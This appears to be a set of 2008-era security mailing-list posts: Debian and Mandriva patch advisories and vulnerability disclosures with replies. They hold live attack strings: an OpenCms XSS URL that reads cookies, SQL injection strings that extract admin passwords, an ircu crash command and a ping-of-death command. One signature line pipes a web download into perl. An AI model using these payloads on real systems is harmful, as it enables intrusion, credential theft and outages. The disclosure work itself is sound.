For the old stable distribution (sarge), this problem has been fixed in
version 0.23+sarge1.

For the unstable distribution (sid), this problem has been fixed in
version 0.34.

We recommend that you upgrade your debian-goodies package.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
--------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/d/debian-goodies/debian-goodies_0.23+sarge1.tar.gz
    Size/MD5 checksum:    11779 e0834e7e962fabc65362a60c73362585
  http://security.debian.org/pool/updates/main/d/debian-goodies/debian-goodies_0.23+sarge1.dsc
    Size/MD5 checksum:      819 37eb124fef7c9897ea41ec861ec740ff

Architecture independent packages:

  http://security.debian.org/pool/updates/main/d/debian-goodies/debian-goodies_0.23+sarge1_all.deb
    Size/MD5 checksum:    22488 c8bc8eab12c7e3f29e53f4172ee837a4

Debian GNU/Linux 4.0 alias etch
-------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/d/debian-goodies/debian-goodies_0.27+etch1.dsc
    Size/MD5 checksum:      836 8653d033f9e6b9f0949fab2cc1813970
  http://security.debian.org/pool/updates/main/d/debian-goodies/debian-goodies_0.27+etch1.tar.gz
    Size/MD5 checksum:    28708 089ff8f154eb3fe4bc47dd85f1581a65

Architecture independent packages:

  http://security.debian.org/pool/updates/main/d/debian-goodies/debian-goodies_0.27+etch1_all.deb
    Size/MD5 checksum:    36868 2739973911e8b0d9ec12559507f6a708

  These files will probably be moved into the stable distribution on
  its next update.

--------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
Re: XSS in cPanel 11.x
Hello,

Is this internal or external, i.e. do you need to be logged in? I tested external/internal and nothing; it appears to just dump it out as a missing directory or manpage.

"Could not open /usr/man/man3/%3Cscript%3Ealert(LeZr)%3C/script%3E.3"

Also I believe you meant to place x3 instead of x after frontend? If not, it still just says manpage not found.

I tested this out on 11.18.3-STABLE build 21703.

Regards
Joshua
Re: Linksys phone adapter denial of service
[EMAIL PROTECTED] wrote:
> Linksys phone adapter denial of service
>
> Product Information
> Product Name: SPA-2102
> Serial Number: FM500G582390
> Software Version: 3.3.6
> Hardware Version: 1.2.5(a)
>
> Another device hit with the PoD!
>
> ping -l 65500 192.168.0.1
>
> Only seems to work on the internal network.
>
> discovered by sipher
>
> http://core.ifconfig.se/~core/

This is just as bad as the "pull the plug out of the device" since you're local attack. Is Linksys going to provide an epoxy fix for the plug?

--
J. Oquendo
SGFA #579 (FW+VPN v4.1)
SGFE #574 (FW+VPN v4.1)

wget -qO - www.infiltrated.net/sig|perl

http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x3AC173DB
RE: hacking the mitsubishi GB-50A
If you read your own post you would realize that Mitsubishi kept the device IP address prefix as 192.168.1, so only you can attack yourself. 192.168 cannot be accessed from the internet ;-) [unless you NAT, at which point it's your NAT config problem]

-----Original Message-----
From: Chris Withers [mailto:[EMAIL PROTECTED]]
Sent: Friday, March 21, 2008 9:50 PM
To: bugtraq@securityfocus.com
Subject: hacking the mitsubishi GB-50A

Hi All,

Well, it's been over 4 months since my plea for a security contact at Mitsubishi Electric to come forward. Since no one has, I thought I'd release a POC for hacking one.

It's not exactly hard, the web controller uses a nasty set of Java applets to interact with itself. The shocking thing is that these communicate using a series of xml packets and absolutely zero authentication or encryption :-(

Oh, and just in case you thought about maybe putting something secure like an ssl webserver proxying the thing, these java applets are hard coded to connect back to port 80 on the originating host using HTTP :-(

Still, you should get an idea of how the box is *supposed* to be used by the fact that its ip address is set with dip switches where the 192.168.1 bit is hard coded! *sigh*

Well, please find attached a little python script that will let you turn on or off every aircon unit attached to a GB-50 that you know the ip address of. Minor modifications will let you change the set point and mode too, so you might be able to turn off a data centre's aircon *or* turn an office's aircon up to 28'C and then turn it all on ;-)

The plus side is that because it's so ridiculously insecure, it's not that hard to build a secure web app that can interact with it and then just firewall it off from anywhere harmful...

If you have a GB-50 or a GB-50A, please make very sure you keep it on its own private network until Mitsubishi Electric find a clue stick to hit themselves with!

cheers,

Chris

--
Simplistix - Content Management, Zope & Python Consulting
- http://www.simplistix.co.uk
ircu/snircd remote crash vulnerability
Affected software
-----------------
ircu (up to and including 2.10.12.12)
snircd (up to and including 1.3.4)
and many other ircu derivatives

Vulnerability details
---------------------
send_user_mode in s_user.c does not check that the argument after a +r mode is present; if it is not, then the NULL sentinel may be missed, causing the function to iterate over the boundary of the array.

One possible exploit:

/mode nickname i i i i i i i i i i i i i i i r r r r s

This won't work if there's another NULL directly after the first one left over from the previously parsed command; if this is the case one can just append more modes or send some other junk to the ircd.

Resolution
----------
Upgrade to the very latest version of ircu/snircd.

Disclosure timeline
-------------------
2008-03-15: Vulnerability discovered by QuakeNet and reported to Undernet.
2008-03-15: Patches released.
2008-03-17: Patches applied to public servers.
2008-03-24: Public disclosure.

--
Chris Porter (slug on QuakeNet)
http://www.warp13.co.uk
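As an added illustration, not ircu's code: a hypothetical, simplified user-mode parser in C that bounds-checks an argument-taking mode letter against the argument count (parc) instead of trusting a NULL sentinel, which is the class of check the advisory says send_user_mode lacked. The struct, function and inputs are all constructed for this note.

```c
#include <stdio.h>
#include <string.h>
/* Hypothetical, simplified mode parser written for this note; it is not
 * ircu's send_user_mode(). parv[0] holds the mode letters, parv[1..parc-1]
 * their arguments. A mode that consumes an argument ('r' here) must be
 * bounds-checked against parc, not against a NULL the previous command
 * may or may not have left after the last argument. */
typedef struct {
    int invisible;      /* +i / -i */
    char account[32];   /* set by +r <account>, cleared by -r */
    int consumed;       /* how many arguments were actually used */
} mode_result;

/* Returns 0 on success, -1 if a mode needs an argument that is not there. */
int parse_user_modes(int parc, char *parv[], mode_result *out)
{
    int argi = 1, add = 1;   /* argi: index of the next unconsumed argument */
    memset(out, 0, sizeof *out);
    if (parc < 1 || parv[0] == NULL)
        return -1;
    for (const char *m = parv[0]; *m != '\0'; m++) {
        switch (*m) {
        case '+': add = 1; break;
        case '-': add = 0; break;
        case 'i': out->invisible = add; break;
        case 'r':
            if (!add) { out->account[0] = '\0'; break; }
            /* The check the advisory describes as missing: only read
             * parv[argi] when the caller-supplied count says it exists. */
            if (argi >= parc || parv[argi] == NULL)
                return -1;
            strncpy(out->account, parv[argi], sizeof out->account - 1);
            argi++;
            break;
        default: break;  /* unknown mode letters are ignored */
        }
    }
    out->consumed = argi - 1;
    return 0;
}

int main(void)
{
    /* Constructed inputs shaped like the advisory's example */
    char *good[] = { "+ir", "alice" };
    char *bad[]  = { "iiiiiiiiiiiiiiirrrrs" };  /* repeated 'r', no arguments */
    mode_result r;
    printf("good: %d account=%s\n", parse_user_modes(2, good, &r), r.account);
    printf("bad:  %d\n", parse_user_modes(1, bad, &r));  /* -1, no out-of-bounds read */
    return 0;
}
```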
Alkacon OpenCms users_list.jsp searchfilter XSS
Alkacon OpenCms users_list.jsp searchfilter XSS

Product: Alkacon OpenCms
http://www.opencms.org/

OpenCms contains a cross-site scripting vulnerability in the user management function. Input to parameter searchfilter in page opencms/system/workplace/admin/accounts/users_list.jsp is not sufficiently validated and/or sanitized before it gets embedded in the resulting web page.

Example:

http://(target)/opencms/system/workplace/admin/accounts/users_list.jsp?
ispopup=&action=listsearch&framename=&title=
&closelink=%252Fopencms%252Fopencms%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Faction%253Dinitial%2526path%253D%252Faccounts%252Forgunit
&preactiondone=&dialogtype=&message=&resource=&listaction=&base=&selitems=
&formname=lsu-form&sortcol=&oufqn=&originalparams=&page=&style=new&root=
&path=%252Faccounts%252Forgunit%252Fusers&redirect=
&searchfilter=%3C%2Fscript%3E%3Ciframe+onload%3Dalert%28document.cookie%29%3E%3Cscript%3E
&listSearchFilter=%3C%2Fscript%3E%3Ciframe+onload%3Dalert%28document.cookie%29%3E%3Cscript%3E

The vulnerability has been identified in version 7.0.3. However, other versions may also be affected.

Solution: Users should not browse untrusted sites while logged into OpenCms.

Found by: nnposter
Linksys phone adapter denial of service
Linksys phone adapter denial of service

Product Information
Product Name: SPA-2102
Serial Number: FM500G582390
Software Version: 3.3.6
Hardware Version: 1.2.5(a)

Another device hit with the PoD!

ping -l 65500 192.168.0.1

Only seems to work on the internal network.

discovered by sipher
http://core.ifconfig.se/~core/
[ MDVSA-2008:075 ] - Updated bzip2 packages fix denial of service vulnerability
Mandriva Linux Security Advisory MDVSA-2008:075
http://www.mandriva.com/security/

Package : bzip2
Date: March 23, 2008
Affected: 2007.0, 2007.1, 2008.0, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0

Problem Description:

Bzip2 versions before 1.0.5 are vulnerable to a denial of service attack via malicious compressed data. The updated packages have been patched to prevent the issue.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1372

Updated Packages:
Re: Potential SQL injection vulnerability in Apache::AuthCAS
Never saw this email that supposedly was sent to me, but I did run across a patch on CPAN a user sent me referencing this post. I have updated the module to use only bind parameters to guard against this issue. It's currently pending on CPAN.
F5 BIG-IP Web Management Audit Log XSS
F5 BIG-IP Web Management Audit Log XSS

Product: F5 BIG-IP
http://www.f5.com/products/big-ip/

The F5 BIG-IP web management interface contains a persistent cross-site scripting vulnerability in the audit log facility. Log entries are output raw, without being HTML-encoded first. This allows an attacker to create a log entry with an embedded script that gets executed any time the audit log is later reviewed by an administrator.

One of several exploit vectors is to create a node object with a script embedded in the node name. The creation will fail due to unsupported characters, but an audit log entry still gets created. Other confirmed entry points are sysContact and sysLocation on the SNMP configuration page.

It is possible to craft URL links that would generate a suitable log entry with a simple HTTP GET request. This allows the attack to be carried out remotely.

The vulnerability has been identified in version 9.4.3. However, other versions may also be affected.

Solution: Do not use the web management interface to review audit logs. Use the SSH CLI instead.

Found by: nnposter
EfesTech E-Kontr (id) Remote SQL INJECTION
##
$Author = RMx
$home page = www.coderx.org
$thanks = Dynamic, TR_IP, Liz0zim
$Script name = Efestech E-Kontör (tr)
$script test = http://www.aspindir.com/Goster/5145
$script sales = 750 YTL
##

// EfesTech E-Kontör (id) Remote SQL INJECTION //

Table names:
id no = id
password : sifre
users = firma

exploit for password = ?id=-1%20union+select+0,sifre,2,3+from+admin+where+id=1
exploit for usernames = ?id=-1%20union+select+0,firma,2,3+from+admin+where+id=1

Note = ID values 1 or 2 for admin

Bye